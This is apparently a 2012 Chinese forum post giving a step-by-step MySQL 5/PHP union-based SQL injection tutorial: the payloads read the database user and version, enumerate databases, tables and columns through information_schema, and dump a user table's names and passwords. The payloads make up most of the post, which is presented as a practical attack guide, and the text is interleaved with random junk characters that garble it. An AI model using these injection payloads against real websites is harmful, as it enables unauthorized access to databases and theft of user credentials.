2 s& M6 Y0 I0 r' I/ T- ]教程内容:Mysql 5+php 注入
+ K) C1 x, M" o, n0 W0 R1 Q# D8 A: |: I% Y
# Y! c6 u6 ^. I1 L0 C4 j1 E
: v7 h6 R& J7 V) J# Z( q一.查看MYSQL基本信息(库名,版本,用户)/ @ D7 u- `7 c, @! r) w
; n0 A9 j/ l, l$ M$ dand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
: ?, {% I& K4 @1 _! V; ^2 e. w( G2 `7 v/ Z8 Q0 x% w( A
二.查数据库" e ^$ L e+ a9 w9 O4 Z
" _* [1 @# t3 E5 A
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*5 r7 }1 ^) D5 G1 J0 S! }" \
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
7 n9 v! J8 \1 U) K
F# J( S: i5 I2 I三.暴表
: J. v% I7 ~6 n( L' r( r( ^1 T' h' q
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*+ S, B- u K3 E1 {; b* t" o1 Y
% A: c! `+ ]/ R8 o& b
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
" y: m/ p3 a' L( f
" F9 L a. h" I/ g& Y. [/ n+ s四.暴字段
( \& i4 ?: h' u! S: C0 C+ G6 b) K$ }9 \$ B! B4 t. d/ L% p
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*; G& k+ ~: {+ n5 G7 E
1 L( S* q l' @0 x- W) L, Xlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。% l# A* I5 U) A3 c& x7 n' A; r) q( _
5 P3 Q3 _% k) q- X3 k$ k9 z五.暴数据& P6 b; [# Y% n: A0 i
/ C' f& A' G% _6 ?4 E7 D
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*& o9 `( @( r$ i% v; ~
7 f" g! h0 {" A( O$ [: w- T# t$ ?8 ~
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。/ T5 `* H8 v0 y1 o, i
|
发表于 2012-9-13 16:27:53
收藏
支持
反对